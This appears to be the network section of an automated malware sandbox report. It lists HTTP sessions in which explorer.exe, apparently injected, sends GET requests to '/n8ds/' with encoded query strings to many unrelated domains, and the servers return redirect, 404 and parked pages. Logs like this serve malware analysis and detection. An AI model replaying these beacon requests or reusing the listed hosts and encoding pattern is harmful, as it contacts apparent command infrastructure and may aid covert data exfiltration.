31	192.168.11.20	49822	35.244.144.199	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:39:22.938014030 CET	526	OUT	GET /n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14 HTTP/1.1 Host: www.gdav130.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:39:23.234057903 CET	527	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 Date: Wed, 01 Dec 2021 09:39:23 GMT Content-Type: text/html Content-Length: 5379 Last-Modified: Fri, 30 Apr 2021 06:44:28 GMT Vary: Accept-Encoding ETag: "608ba74c-1503" Cache-Control: no-cache Accept-Ranges: bytes Via: 1.1 google Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 26 26 28 77 69 6e 64 6f 77 2e 77 70 6b 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 28 7b 62 69 64 3a 22 62 65 72 67 2d 64 6f 77 6e 6c 6f 61 64 22 2c 72 65 6c 3a 22 32 2e 32 35 2e 31 22 2c 73 61 6d 70 6c 65 52 61 74 65 3a 31 2c 70 6c 75 67 69 6e 73 3a 5b 5b 77 69 6e 64 6f 77 2e 77 70 6b 67 6c 6f 62 61 6c 65 72 72 6f 72 50 6c 75 67 69 6e 2c 7b 6a 73 45 72 72 3a 21 30 2c 6a 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 2c 72 65 73 45 72 72 3a 21 30 2c 72 65 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 7d 5d 2c 5b 77 69 6e 64 6f 77 2e 77 70 6b 70 65 72 66 6f 72 6d 61 6e 63 65 50 6c 75 67 69 6e 2c 7b 65 6e 61 62 6c 65 3a 21 30 2c 73 61 6d 70 6c 65 52 61 74 65 3a 2e 35 7d 5d 5d 7d 29 2c 77 69 6e 64 6f 77 2e 77 70 6b 2e 69 6e 73 74 61 6c 6c 28 29 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 42 61 69 64 75 48 6d 74 28 74 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 22 2c 74 29 3b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 22 2b 74 3b 76 61 72 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 62 61 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 73 68 28 5b 22 5f 74 72 61 63 6b 45 76 65 6e 74 22 2c 74 2c Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.25.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}function baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,
Dec 1, 2021 10:39:23.234146118 CET	529	IN	Data Raw: 65 2c 6f 5d 29 7d 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e5 8a a0 e8 bd bd e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 e8 84 9a e6 9c ac 2e 2e 2e 22 29 2c 77 69 6e 64 6f 77 2e 5f 68 6d 74 3d 77 69 6e 64 6f 77 2e 5f 68 6d 74 7c 7c 5b 5d 3b 63 6f 6e 73 74 Data Ascii: e,o])}console.log("..."),window._hmt=window._hmt\|\|[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc";loadBaiduHmt(token)</script><script>function send(n){(new Image).src=n}function reportLoading(n){n=n\|
Dec 1, 2021 10:39:23.234213114 CET	530	IN	Data Raw: 6c 61 63 65 28 2f 25 32 30 2f 67 2c 22 2b 22 29 2c 73 3d 22 22 2e 63 6f 6e 63 61 74 28 22 68 74 74 70 73 3a 2f 2f 74 72 61 63 6b 2e 75 63 2e 63 6e 2f 63 6f 6c 6c 65 63 74 22 2c 22 3f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 26 22 29 2e 63 6f 6e 63 Data Ascii: lace(/%20/g,"+"),s="".concat("https://track.uc.cn/collect","?").concat(c,"&").concat("uc_param_str=dsfrpfvedncpssntnwbipreimeutsv");(o()\|\|a())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android"
Dec 1, 2021 10:39:23.234257936 CET	530	IN	Data Raw: 72 63 68 7c 7c 22 3f 22 29 2e 73 75 62 73 74 72 69 6e 67 28 31 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6c 65 6e 3d 71 73 4c 69 73 74 2e 6c 65 6e 67 74 68 2c 69 3d 30 3b 69 3c 6c 65 6e 3b 69 2b 2b 29 7b 76 61 72 20 65 3d 71 73 4c 69 73 74 5b 69 5d Data Ascii: rch\|\|"?").substring(1).split("&"),len=qsList.length,i=0;i<len;i++){var e=qsList[i];if("debug=t
Dec 1, 2021 10:39:23.248006105 CET	532	IN	Data Raw: 72 75 65 22 3d 3d 3d 65 29 7b 76 61 72 20 24 68 65 61 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 2c 24 73 63 72 69 70 74 31 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 Data Ascii: rue"===e){var $head=document.getElementsByTagName("head")[0],$script1=document.createElement("script");$script1.setAttribute("crossorigin","anonymous"),$script1.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js")
Dec 1, 2021 10:39:23.248079062 CET	532	IN	Data Raw: 76 20 63 6c 61 73 73 3d 22 6e 6f 2d 61 64 22 3e e6 b2 a1 e6 9c 89 e5 b9 bf e5 91 8a 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 94 b5 e5 bd b1 e6 92 ad e6 94 be e4 b8 8d e5 8d a1 e9 a1 bf 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 b2 be e5 bd a9 e8 a7 86 e9 a2 Data Ascii: v class="no-ad"></div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.cb2b0f54365b00b5316b.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.11.20	49823	44.227.76.166	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:39:28.819186926 CET	533	OUT	GET /n8ds/?gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr&3fkxqn=hXcDbfFHWB34bR8p HTTP/1.1 Host: www.apps365.one Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:39:29.003925085 CET	533	IN	HTTP/1.1 307 Temporary Redirect Server: openresty Date: Wed, 01 Dec 2021 09:39:28 GMT Content-Type: text/html; charset=utf-8 Content-Length: 168 Connection: close Location: http://apps365.one X-Frame-Options: sameorigin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.11.20	49824	185.61.153.97	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:39:34.043601990 CET	534	OUT	GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1 Host: www.dif-directory.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:39:34.072640896 CET	535	IN	HTTP/1.1 301 Moved Permanently keep-alive: timeout=5, max=100 content-type: text/html content-length: 707 date: Wed, 01 Dec 2021 09:39:34 GMT server: LiteSpeed location: https://www.dif-directory.xyz/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c x-turbo-charged-by: LiteSpeed x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains; preload; referrer-policy: no-referrer-when-downgrade connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.11.20	49825	185.98.5.234	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:39:39.177602053 CET	536	OUT	GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1 Host: www.avto-click.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:39:39.279314041 CET	536	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 01 Dec 2021 09:39:39 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.avto-click.com/n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr Strict-Transport-Security: max-age=31536000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.11.20	49826	66.29.140.185	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:39:56.641159058 CET	538	OUT	GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4 HTTP/1.1 Host: www.lopsrental.lease Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:39:56.898849010 CET	539	IN	HTTP/1.1 404 Not Found Date: Wed, 01 Dec 2021 09:39:56 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 282 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 70 73 72 65 6e 74 61 6c 2e 6c 65 61 73 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.11.20	49794	44.227.76.166	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:34:14.661091089 CET	455	OUT	GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr HTTP/1.1 Host: www.apps365.one Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:34:14.840756893 CET	456	IN	HTTP/1.1 307 Temporary Redirect Server: openresty Date: Wed, 01 Dec 2021 09:34:14 GMT Content-Type: text/html; charset=utf-8 Content-Length: 168 Connection: close Location: http://apps365.one X-Frame-Options: sameorigin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.11.20	49795	198.54.117.217	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:34:20.311655045 CET	457	OUT	GET /n8ds/?gHl=tFWpUqTJBKKZjj7mpmRmO+UO9YCEuI1l6CuT88R3V9vk9mUNjYvQT6q9cPheoq+XMEYl&4ha8=4hi0dlyHZliDfr HTTP/1.1 Host: www.receiptpor.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.11.20	49796	216.250.120.206	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:34:25.618849039 CET	457	OUT	GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=f/B16EdvHg/4mql2vq5Md1sx/t71Njj4R8zlekrOfJu06zuLM7yaFZuMLQOQaJsZfcYK HTTP/1.1 Host: www.writingmomsobitwithmom.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:34:25.756627083 CET	459	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 1271 Connection: close Date: Wed, 01 Dec 2021 09:34:25 GMT Server: Apache X-Frame-Options: deny Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 73 72 63 3d 22 2f 2f 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 66 72 6d 70 61 72 6b 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 55 53 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta 